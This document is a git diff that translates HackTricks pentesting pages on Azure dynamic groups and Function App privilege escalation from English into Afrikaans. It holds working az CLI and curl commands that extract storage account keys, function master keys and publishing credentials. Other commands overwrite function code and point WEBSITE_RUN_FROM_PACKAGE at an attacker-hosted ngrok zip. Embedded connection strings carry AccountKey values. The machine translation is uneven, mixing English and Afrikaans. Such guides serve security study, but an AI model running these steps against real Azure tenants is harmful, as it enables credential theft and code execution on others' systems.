[https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ -Unfortunately the page doesn't allow to modify the attribute values so we need to use the API: +- **Reël voorbeeld**: `(user.otherMails -any (_ -contains "security")) -and (user.userType -eq "guest")` +- **Reël beskrywing**: Enige Gaste gebruiker met 'n sekondêre e-pos met die string 'security' sal aan die groep toegevoegd word +Vir die Gaste gebruiker se e-pos, aanvaar die uitnodiging en kontroleer die huidige instellings van **daardie gebruiker** in [https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView](https://entra.microsoft.com/#view/Microsoft_AAD_IAM/TenantOverview.ReactView).\ +Ongelukkig laat die bladsy nie toe om die attribuutwaardes te wysig nie, so ons moet die API gebruik: ```powershell # Login with the gust user az login --allow-no-subscriptions @@ -33,22 +32,17 @@ az ad signed-in-user show # Update otherMails az rest --method PATCH \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --headers 'Content-Type=application/json' \ - --body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}' +--url "https://graph.microsoft.com/v1.0/users/" \ +--headers 'Content-Type=application/json' \ +--body '{"otherMails": ["newemail@example.com", "anotheremail@example.com"]}' # Verify the update az rest --method GET \ - --url "https://graph.microsoft.com/v1.0/users/" \ - --query "otherMails" +--url "https://graph.microsoft.com/v1.0/users/" \ +--query "otherMails" ``` - -## References +## Verwysings - [https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/](https://www.mnemonic.io/resources/blog/abusing-dynamic-groups-in-azure-ad-for-privilege-escalation/) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md index dd5b81f35..25d27c201 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-functions-app-privesc.md @@ -2,43 +2,40 @@ {{#include ../../../banners/hacktricks-training.md}} -## Function Apps +## Funksie Apps -Check the following page for more information: +Kyk die volgende bladsy vir meer inligting: {{#ref}} ../az-services/az-function-apps.md {{#endref}} -### Bucket Read/Write +### Emmer Lees/Skryf -With permissions to read the containers inside the Storage Account that stores the function data it's possible to find **different containers** (custom or with pre-defined names) that might contain **the code executed by the function**. +Met toestemmings om die houers binne die Stoorrekening wat die funksiedata stoor te lees, is dit moontlik om **verskillende houers** (pasgemaak of met vooraf gedefinieerde name) te vind wat **die kode wat deur die funksie uitgevoer word** mag bevat. -Once you find where the code of the function is located if you have write permissions over it you can make the function execute any code and escalate privileges to the managed identities attached to the function. +Sodra jy vind waar die kode van die funksie geleë is, as jy skryftoestemmings daaroor het, kan jy die funksie laat uitvoer enige kode en voorregte opgradeer na die bestuurde identiteite wat aan die funksie gekoppel is. -- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE)` +- **`File Share`** (`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` en `WEBSITE_CONTENTSHARE)` -The code of the function is usually stored inside a file share. With enough access it's possible to modify the code file and **make the function load arbitrary code** allowing to escalate privileges to the managed identities attached to the Function. - -This deployment method usually configures the settings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** and **`WEBSITE_CONTENTSHARE`** which you can get from +Die kode van die funksie word gewoonlik binne 'n lêerdeel gestoor. Met genoeg toegang is dit moontlik om die kode-lêer te wysig en **die funksie te laat laai arbitrêre kode**, wat toelaat om voorregte op te gradeer na die bestuurde identiteite wat aan die Funksie gekoppel is. +Hierdie ontplooiingsmetode konfigureer gewoonlik die instellings **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** en **`WEBSITE_CONTENTSHARE`** wat jy kan kry van ```bash az functionapp config appsettings list \ - --name \ - --resource-group +--name \ +--resource-group ``` - -Those configs will contain the **Storage Account Key** that the Function can use to access the code. +Die konfigurasies sal die **Storage Account Key** bevat wat die Funksie kan gebruik om toegang tot die kode te verkry. > [!CAUTION] -> With enough permission to connect to the File Share and **modify the script** running it's possible to execute arbitrary code in the Function and escalate privileges. +> Met genoeg toestemming om met die File Share te verbind en **die skrip** te wysig, is dit moontlik om arbitrêre kode in die Funksie uit te voer en bevoegdhede te verhoog. -The following example uses macOS to connect to the file share, but it's recommended to check also the following page for more info about file shares: +Die volgende voorbeeld gebruik macOS om met die file share te verbind, maar dit word aanbeveel om ook die volgende bladsy te raadpleeg vir meer inligting oor file shares: {{#ref}} ../az-services/az-file-shares.md {{#endref}} - ```bash # Username is the name of the storage account # Password is the Storage Account Key @@ -48,50 +45,46 @@ The following example uses macOS to connect to the file share, but it's recommen open "smb://.file.core.windows.net/" ``` - - **`function-releases`** (`WEBSITE_RUN_FROM_PACKAGE`) -It's also common to find the **zip releases** inside the folder `function-releases` of the Storage Account container that the function app is using in a container **usually called `function-releases`**. - -Usually this deployment method will set the `WEBSITE_RUN_FROM_PACKAGE` config in: +Dit is ook algemeen om die **zip vrystellings** binne die gids `function-releases` van die Stoorrekening houer te vind wat die funksie-app gebruik in 'n houer **gewoonlik genoem `function-releases`**. +Gewoonlik sal hierdie ontplooiingsmetode die `WEBSITE_RUN_FROM_PACKAGE` konfigurasie stel in: ```bash az functionapp config appsettings list \ - --name \ - --resource-group +--name \ +--resource-group ``` - -This config will usually contain a **SAS URL to download** the code from the Storage Account. +This config will usually contain a **SAS URL om die** code van die Storage Account af te laai. > [!CAUTION] -> With enough permission to connect to the blob container that **contains the code in zip** it's possible to execute arbitrary code in the Function and escalate privileges. +> Met genoeg toestemming om te verbind met die blob-container wat die **kode in zip bevat** is dit moontlik om arbitrêre kode in die Funksie uit te voer en bevoegdhede te verhoog. -- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` +- **`github-actions-deploy`** (`WEBSITE_RUN_FROM_PACKAGE)` -Just like in the previous case, if the deployment is done via Github Actions it's possible to find the folder **`github-actions-deploy`** in the Storage Account containing a zip of the code and a SAS URL to the zip in the setting `WEBSITE_RUN_FROM_PACKAGE`. +Net soos in die vorige geval, as die ontplooiing via Github Actions gedoen word, is dit moontlik om die gids **`github-actions-deploy`** in die Storage Account te vind wat 'n zip van die kode en 'n SAS URL na die zip in die instelling `WEBSITE_RUN_FROM_PACKAGE` bevat. -- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` and `WEBSITE_CONTENTSHARE`) - -With permissions to read the containers inside the Storage Account that stores the function data it's possible to find the container **`scm-releases`**. In there it's possible to find the latest release in **Squashfs filesystem file format** and therefore it's possible to read the code of the function: +- **`scm-releases`**`(WEBSITE_CONTENTAZUREFILECONNECTIONSTRING` en `WEBSITE_CONTENTSHARE`) +Met toestemming om die houers binne die Storage Account wat die funksiedata stoor te lees, is dit moontlik om die houer **`scm-releases`** te vind. Daarbinne is dit moontlik om die nuutste vrystelling in **Squashfs filesystem file format** te vind en daarom is dit moontlik om die kode van die funksie te lees: ```bash # List containers inside the storage account of the function app az storage container list \ - --account-name \ - --output table +--account-name \ +--output table # List files inside one container az storage blob list \ - --account-name \ - --container-name \ - --output table +--account-name \ +--container-name \ +--output table # Download file az storage blob download \ - --account-name \ - --container-name scm-releases \ - --name scm-latest-.zip \ - --file /tmp/scm-latest-.zip +--account-name \ +--container-name scm-releases \ +--name scm-latest-.zip \ +--file /tmp/scm-latest-.zip ## Even if it looks like the file is a .zip, it's a Squashfs filesystem @@ -105,12 +98,10 @@ unsquashfs -l "/tmp/scm-latest-.zip" mkdir /tmp/fs unsquashfs -d /tmp/fs /tmp/scm-latest-.zip ``` - -It's also possible to find the **master and functions keys** stored in the storage account in the container **`azure-webjobs-secrets`** inside the folder **``** in the JSON files you can find inside. +Dit is ook moontlik om die **master en funksies sleutels** wat in die stoorrekening gestoor is, te vind in die houer **`azure-webjobs-secrets`** binne die gids **``** in die JSON-lêers wat jy daarbinne kan vind. > [!CAUTION] -> With enough permission to connect to the blob container that **contains the code in a zip extension file** (which actually is a **`squashfs`**) it's possible to execute arbitrary code in the Function and escalate privileges. - +> Met genoeg toestemming om te verbind met die blob houer wat die **kode in 'n zip-uitbreiding lêer** bevat (wat eintlik 'n **`squashfs`** is), is dit moontlik om arbitrêre kode in die Funksie uit te voer en bevoegdhede te verhoog. ```bash # Modify code inside the script in /tmp/fs adding your code @@ -119,36 +110,30 @@ mksquashfs /tmp/fs /tmp/scm-latest-.zip -b 131072 -noappend # Upload it to the blob storage az storage blob upload \ - --account-name \ - --container-name scm-releases \ - --name scm-latest-.zip \ - --file /tmp/scm-latest-.zip \ - --overwrite +--account-name \ +--container-name scm-releases \ +--name scm-latest-.zip \ +--file /tmp/scm-latest-.zip \ +--overwrite ``` - ### Microsoft.Web/sites/host/listkeys/action -This permission allows to list the function, master and system keys, but not the host one, of the specified function with: - +Hierdie toestemming laat toe om die funksie, meester en stelselsleutels te lys, maar nie die gasheer een nie, van die gespesifiseerde funksie met: ```bash az functionapp keys list --resource-group --name ``` - -With the master key it's also possible to to get the source code in a URL like: - +Met die meester sleutel is dit ook moontlik om die bronkode in 'n URL soos: ```bash # Get "script_href" from az rest --method GET \ - --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01" +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions?api-version=2024-04-01" # Access curl "?code=" ## Python example: curl "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwroot/function_app.py?code=RByfLxj0P-4Y7308dhay6rtuonL36Ohft9GRdzS77xWBAzFu75Ol5g==" -v ``` - -And to **change the code that is being executed** in the function with: - +En om **die kode wat uitgevoer word** in die funksie te verander met: ```bash # Set the code to set in the function in /tmp/function_app.py ## The following continues using the python example @@ -158,73 +143,57 @@ curl -X PUT "https://newfuncttest123.azurewebsites.net/admin/vfs/home/site/wwwro -H "If-Match: *" \ -v ``` - ### Microsoft.Web/sites/functions/listKeys/action -This permission allows to get the host key, of the specified function with: - +Hierdie toestemming laat toe om die gasheersleutel van die gespesifiseerde funksie te verkry met: ```bash az rest --method POST --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//listKeys?api-version=2022-03-01" ``` - ### Microsoft.Web/sites/host/functionKeys/write -This permission allows to create/update a function key of the specified function with: - +Hierdie toestemming stel in staat om 'n funksiesleutel van die gespesifiseerde funksie te skep/op te dateer met: ```bash az functionapp keys set --resource-group --key-name --key-type functionKeys --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` - ### Microsoft.Web/sites/host/masterKey/write -This permission allows to create/update a master key to the specified function with: - +Hierdie toestemming stel in staat om 'n meester sleutel vir die gespesifiseerde funksie te skep/op te dateer met: ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` - > [!CAUTION] -> Remember that with this key you can also access the source code and modify it as explained before! +> Onthou dat jy met hierdie sleutel ook toegang tot die bronkode kan verkry en dit kan wysig soos voorheen verduidelik! ### Microsoft.Web/sites/host/systemKeys/write -This permission allows to create/update a system function key to the specified function with: - +Hierdie toestemming stel jou in staat om 'n stelselsleutel vir 'n funksie te skep/op te dateer na die gespesifiseerde funksie met: ```bash az functionapp keys set --resource-group --key-name --key-type masterKey --name --key-value q_8ILAoJaSp_wxpyHzGm4RVMPDKnjM_vpEb7z123yRvjAzFuo6wkIQ== ``` - ### Microsoft.Web/sites/config/list/action -This permission allows to get the settings of a function. Inside these configurations it might be possible to find the default values **`AzureWebJobsStorage`** or **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** which contains an **account key to access the blob storage of the function with FULL permissions**. - +Hierdie toestemming laat toe om die instellings van 'n funksie te verkry. Binne hierdie konfigurasies mag dit moontlik wees om die standaardwaardes **`AzureWebJobsStorage`** of **`WEBSITE_CONTENTAZUREFILECONNECTIONSTRING`** te vind wat 'n **rekening sleutel bevat om toegang te verkry tot die blob stoor van die funksie met VOLLE toestemmings**. ```bash az functionapp config appsettings list --name --resource-group ``` - -Moreover, this permission also allows to get the **SCM username and password** (if enabled) with: - +Boonop stel hierdie toestemming ook in staat om die **SCM gebruikersnaam en wagwoord** (indien geaktiveer) te verkry met: ```bash az rest --method POST \ - --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/publishingcredentials/list?api-version=2018-11-01" +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//config/publishingcredentials/list?api-version=2018-11-01" ``` - ### Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/write -These permissions allows to list the config values of a function as we have seen before plus **modify these values**. This is useful because these settings indicate where the code to execute inside the function is located. +Hierdie toestemmings laat toe om die konfigurasiewaarde van 'n funksie te lys soos ons voorheen gesien het plus **hierdie waardes te wysig**. Dit is nuttig omdat hierdie instellings aandui waar die kode om binne die funksie uit te voer geleë is. -It's therefore possible to set the value of the setting **`WEBSITE_RUN_FROM_PACKAGE`** pointing to an URL zip file containing the new code to execute inside a web application: - -- Start by getting the current config +Dit is dus moontlik om die waarde van die instelling **`WEBSITE_RUN_FROM_PACKAGE`** te stel wat na 'n URL zip-lêer verwys wat die nuwe kode bevat om binne 'n webtoepassing uit te voer: +- Begin deur die huidige konfigurasie te verkry ```bash az functionapp config appsettings list \ - --name \ - --resource-group +--name \ +--resource-group ``` - -- Create the code you want the function to run and host it publicly - +- Skep die kode wat jy wil hê die funksie moet uitvoer en huis dit publiek. ```bash # Write inside /tmp/web/function_app.py the code of the function cd /tmp/web/function_app.py @@ -234,228 +203,189 @@ python3 -m http.server # Serve it using ngrok for example ngrok http 8000 ``` +- Pas die funksie aan, hou die vorige parameters en voeg aan die einde die konfigurasie **`WEBSITE_RUN_FROM_PACKAGE`** by wat na die URL met die **zip** wat die kode bevat, verwys. -- Modify the function, keep the previous parameters and add at the end the config **`WEBSITE_RUN_FROM_PACKAGE`** pointing to the URL with the **zip** containing the code. - -The following is an example of my **own settings you will need to change the values for yours**, note at the end the values `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , this is where I was hosting the app. - +Die volgende is 'n voorbeeld van my **eie instellings waarvoor jy die waardes moet verander na joune**, let aan die einde op die waardes `"WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"` , dit is waar ek die app gehos het. ```bash # Modify the function az rest --method PUT \ - --uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \ - --headers '{"Content-Type": "application/json"}' \ - --body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}' +--uri "https://management.azure.com/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Web/sites/newfunctiontestlatestrelease/config/appsettings?api-version=2023-01-01" \ +--headers '{"Content-Type": "application/json"}' \ +--body '{"properties": {"APPLICATIONINSIGHTS_CONNECTION_STRING": "InstrumentationKey=67b64ab1-a49e-4e37-9c42-ff16e07290b0;IngestionEndpoint=https://canadacentral-1.in.applicationinsights.azure.com/;LiveEndpoint=https://canadacentral.livediagnostics.monitor.azure.com/;ApplicationId=cdd211a7-9981-47e8-b3c7-44cd55d53161", "AzureWebJobsStorage": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net", "FUNCTIONS_EXTENSION_VERSION": "~4", "FUNCTIONS_WORKER_RUNTIME": "python", "WEBSITE_CONTENTAZUREFILECONNECTIONSTRING": "DefaultEndpointsProtocol=https;AccountName=newfunctiontestlatestr;AccountKey=gesefrkJxIk28lccvbTnuGkGx3oZ30ngHHodTyyVQu+nAL7Kt0zWvR2wwek9Ar5eis8HpkAcOVEm+AStG8KMWA==;EndpointSuffix=core.windows.net","WEBSITE_CONTENTSHARE": "newfunctiontestlatestrelease89c1", "WEBSITE_RUN_FROM_PACKAGE": "https://4c7d-81-33-68-77.ngrok-free.app/function_app.zip"}}' ``` - ### Microsoft.Web/sites/hostruntime/vfs/write -With this permission it's **possible to modify the code of an application** through the web console (or through the following API endpoint): - +Met hierdie toestemming is dit **moontlik om die kode van 'n toepassing te wysig** deur die webkonsol (of deur die volgende API-eindpunt): ```bash # This is a python example, so we will be overwritting function_app.py # Store in /tmp/body the raw python code to put in the function az rest --method PUT \ - --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \ - --headers '{"Content-Type": "application/json", "If-Match": "*"}' \ - --body @/tmp/body +--uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" \ +--headers '{"Content-Type": "application/json", "If-Match": "*"}' \ +--body @/tmp/body ``` - ### Microsoft.Web/sites/publishxml/action, (Microsoft.Web/sites/basicPublishingCredentialsPolicies/write) -This permissions allows to list all the publishing profiles which basically contains **basic auth credentials**: - +Hierdie toestemmings laat toe om al die publikasieprofiele te lys wat basies **basiese outentikasie geloofsbriewe** bevat: ```bash # Get creds az functionapp deployment list-publishing-profiles \ - --name \ - --resource-group \ - --output json +--name \ +--resource-group \ +--output json ``` - -Another option would be to set you own creds and use them using: - +'n Ander opsie sou wees om jou eie kredensiale in te stel en dit te gebruik met: ```bash az functionapp deployment user set \ - --user-name DeployUser123456 g \ - --password 'P@ssw0rd123!' +--user-name DeployUser123456 g \ +--password 'P@ssw0rd123!' ``` +- As **REDACTED** geloofsbriewe -- If **REDACTED** credentials - -If you see that those credentials are **REDACTED**, it's because you **need to enable the SCM basic authentication option** and for that you need the second permission (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` - +As jy sien dat daardie geloofsbriewe **REDACTED** is, is dit omdat jy **die SCM basiese outentikasie opsie moet aktiveer** en daarvoor het jy die tweede toestemming (`Microsoft.Web/sites/basicPublishingCredentialsPolicies/write):` nodig. ```bash # Enable basic authentication for SCM az rest --method PUT \ - --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ - --body '{ - "properties": { - "allow": true - } - }' +--uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/scm?api-version=2022-03-01" \ +--body '{ +"properties": { +"allow": true +} +}' # Enable basic authentication for FTP az rest --method PUT \ - --uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ - --body '{ - "properties": { - "allow": true - } - } +--uri "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//basicPublishingCredentialsPolicies/ftp?api-version=2022-03-01" \ +--body '{ +"properties": { +"allow": true +} +} ``` +- **Metode SCM** -- **Method SCM** - -Then, you can access with these **basic auth credentials to the SCM URL** of your function app and get the values of the env variables: - +Dan kan jy toegang verkry met hierdie **basiese outentikasie akrediteerings na die SCM URL** van jou funksie-app en die waardes van die omgewing veranderlikes kry: ```bash # Get settings values curl -u ':' \ - https://.scm.azurewebsites.net/api/settings -v +https://.scm.azurewebsites.net/api/settings -v # Deploy code to the funciton zip function_app.zip function_app.py # Your code in function_app.py curl -u ':' -X POST --data-binary "@" \ - https://.scm.azurewebsites.net/api/zipdeploy +https://.scm.azurewebsites.net/api/zipdeploy ``` +_Note dat die **SCM gebruikersnaam** gewoonlik die karakter "$" gevolg deur die naam van die app is, so: `$`._ -_Note that the **SCM username** is usually the char "$" followed by the name of the app, so: `$`._ +Jy kan ook die webblad toegang vanaf `https://.scm.azurewebsites.net/BasicAuth` -You can also access the web page from `https://.scm.azurewebsites.net/BasicAuth` +Die instellingswaardes bevat die **AccountKey** van die stoorrekening wat die data van die funksie-app stoor, wat toelaat om daardie stoorrekening te beheer. -The settings values contains the **AccountKey** of the storage account storing the data of the function app, allowing to control that storage account. - -- **Method FTP** - -Connect to the FTP server using: +- **Metode FTP** +Verbind met die FTP-bediener deur: ```bash # macOS install lftp brew install lftp # Connect using lftp lftp -u '','' \ - ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/ +ftps://waws-prod-yq1-005dr.ftp.azurewebsites.windows.net/site/wwwroot/ # Some commands ls # List get ./function_app.py -o /tmp/ # Download function_app.py in /tmp put /tmp/function_app.py -o /site/wwwroot/function_app.py # Upload file and deploy it ``` - -_Note that the **FTP username** is usually in the format \\\$\._ +_Note dat die **FTP gebruikersnaam** gewoonlik in die formaat \\\$\ is._ ### Microsoft.Web/sites/publish/Action -According to [**the docs**](https://github.com/projectkudu/kudu/wiki/REST-API#command), this permission allows to **execute commands inside the SCM server** which could be used to modify the source code of the application: - +Volgens [**die dokumentasie**](https://github.com/projectkudu/kudu/wiki/REST-API#command), laat hierdie toestemming toe om **opdragte binne die SCM bediener uit te voer** wat gebruik kan word om die bronkode van die toepassing te wysig: ```bash az rest --method POST \ - --resource "https://management.azure.com/" \ - --url "https://newfuncttest123.scm.azurewebsites.net/api/command" \ - --body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug +--resource "https://management.azure.com/" \ +--url "https://newfuncttest123.scm.azurewebsites.net/api/command" \ +--body '{"command": "echo Hello World", "dir": "site\\repository"}' --debug ``` - ### Microsoft.Web/sites/hostruntime/vfs/read -This permission allows to **read the source code** of the app through the VFS: - +Hierdie toestemming laat toe om die **bronkode** van die toepassing deur die VFS te **lees**: ```bash az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//hostruntime/admin/vfs/function_app.py?relativePath=1&api-version=2022-03-01" ``` - ### Microsoft.Web/sites/functions/token/action -With this permission it's possible to [get the **admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) which can be later used to retrieve the **master key** and therefore access and modify the function's code: - +Met hierdie toestemming is dit moontlik om die [**admin token**](https://learn.microsoft.com/ca-es/rest/api/appservice/web-apps/get-functions-admin-token?view=rest-appservice-2024-04-01) te verkry wat later gebruik kan word om die **master key** te verkry en dus toegang te verkry tot en die funksie se kode te wysig: ```bash # Get admin token az rest --method POST \ - --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions/admin/token?api-version=2024-04-01" \ - --headers '{"Content-Type": "application/json"}' \ - --debug +--url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions/admin/token?api-version=2024-04-01" \ +--headers '{"Content-Type": "application/json"}' \ +--debug # Get master key curl "https://.azurewebsites.net/admin/host/systemkeys/_master" \ - -H "Authorization: Bearer " +-H "Authorization: Bearer " ``` - ### Microsoft.Web/sites/config/write, (Microsoft.Web/sites/functions/properties/read) -This permissions allows to **enable functions** that might be disabled (or disable them). - +Hierdie toestemmings laat toe om **funksies in te skakel** wat dalk gedeaktiveer is (of om hulle te deaktiveer). ```bash # Enable a disabled function az functionapp config appsettings set \ - --name \ - --resource-group \ - --settings "AzureWebJobs.http_trigger1.Disabled=false" +--name \ +--resource-group \ +--settings "AzureWebJobs.http_trigger1.Disabled=false" ``` - -It's also possible to see if a function is enabled or disabled in the following URL (using the permission in parenthesis): - +Dit is ook moontlik om te sien of 'n funksie geaktiveer of gedeaktiveer is in die volgende URL (met die toestemming in hakies): ```bash az rest --url "https://management.azure.com/subscriptions//resourceGroups//providers/Microsoft.Web/sites//functions//properties/state?api-version=2024-04-01" ``` - ### Microsoft.Web/sites/config/write, Microsoft.Web/sites/config/list/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/config/list/action, Microsoft.Web/sites/config/read) -With these permissions it's possible to **modify the container run by a function app** configured to run a container. This would allow an attacker to upload a malicious azure function container app to docker hub (for example) and make the function execute it. - +Met hierdie toestemmings is dit moontlik om die **houer wat deur 'n funksie-app bestuur word** wat geconfigureer is om 'n houer te bestuur, te **wysig**. Dit sou 'n aanvaller in staat stel om 'n kwaadwillige azure funksie houer-app na docker hub (byvoorbeeld) op te laai en die funksie te laat uitvoer. ```bash az functionapp config container set --name \ - --resource-group \ - --image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0" +--resource-group \ +--image "mcr.microsoft.com/azure-functions/dotnet8-quickstart-demo:1.0" ``` - ### Microsoft.Web/sites/write, Microsoft.ManagedIdentity/userAssignedIdentities/assign/action, Microsoft.App/managedEnvironments/join/action, (Microsoft.Web/sites/read, Microsoft.Web/sites/operationresults/read) -With these permissions it's possible to **attach a new user managed identity to a function**. If the function was compromised this would allow to escalate privileges to any user managed identity. - +Met hierdie toestemmings is dit moontlik om **'n nuwe gebruiker bestuurde identiteit aan 'n funksie te koppel**. As die funksie gecompromitteer was, sou dit moontlik wees om voorregte na enige gebruiker bestuurde identiteit te verhoog. ```bash az functionapp identity assign \ - --name \ - --resource-group \ - --identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ +--name \ +--resource-group \ +--identities /subscriptions//providers/Microsoft.ManagedIdentity/userAssignedIdentities/ ``` - ### Remote Debugging -It's also possible to connect to debug a running Azure function as [**explained in the docs**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). However, by default Azure will turn this option to off in 2 days in case the developer forgets to avoid leaving vulnerable configurations. - -It's possible to check if a Function has debugging enabled with: +Dit is ook moontlik om te verbind om 'n lopende Azure-funksie te debug soos [**in die dokumentasie verduidelik**](https://learn.microsoft.com/en-us/azure/azure-functions/functions-develop-vs). egter, standaard sal Azure hierdie opsie na 2 dae afskakel in die geval die ontwikkelaar vergeet om te verhoed dat kwesbare konfigurasies agtergelaat word. +Dit is moontlik om te kyk of 'n Funksie debugging geaktiveer het met: ```bash az functionapp show --name --resource-group ``` - -Having the permission `Microsoft.Web/sites/config/write` it's also possible to put a function in debugging mode (the following command also requires the permissions `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` and `Microsoft.Web/sites/Read`). - +Met die toestemming `Microsoft.Web/sites/config/write` is dit ook moontlik om 'n funksie in foutopsporingmodus te plaas (die volgende opdrag vereis ook die toestemmings `Microsoft.Web/sites/config/list/action`, `Microsoft.Web/sites/config/Read` en `Microsoft.Web/sites/Read`). ```bash az functionapp config set --remote-debugging-enabled=True --name --resource-group ``` +### Verander Github repo -### Change Github repo - -I tried changing the Github repo from where the deploying is occurring by executing the following commands but even if it did change, **the new code was not loaded** (probably because it's expecting the Github Action to update the code).\ -Moreover, the **managed identity federated credential wasn't updated** allowing the new repository, so it looks like this isn't very useful. - +Ek het probeer om die Github repo te verander van waar die ontplooiing plaasvind deur die volgende opdragte uit te voer, maar selfs al het dit verander, **was die nuwe kode nie gelaai nie** (waarskynlik omdat dit verwag dat die Github Action die kode sal opdateer).\ +Boonop was die **bestuurde identiteit federale geloofsbriewe nie opgedateer nie**, wat die nuwe repo toelaat, so dit lyk nie baie nuttig nie. ```bash # Remove current az functionapp deployment source delete \ - --name funcGithub \ - --resource-group Resource_Group_1 +--name funcGithub \ +--resource-group Resource_Group_1 # Load new public repo az functionapp deployment source config \ - --name funcGithub \ - --resource-group Resource_Group_1 \ - --repo-url "https://github.com/orgname/azure_func3" \ - --branch main --github-action true +--name funcGithub \ +--resource-group Resource_Group_1 \ +--repo-url "https://github.com/orgname/azure_func3" \ +--branch main --github-action true ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md index 2db843851..a76bbf61a 100644 --- a/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md +++ b/src/pentesting-cloud/azure-security/az-privilege-escalation/az-key-vault-privesc.md @@ -4,7 +4,7 @@ ## Azure Key Vault -For more information about this service check: +Vir meer inligting oor hierdie diens, kyk: 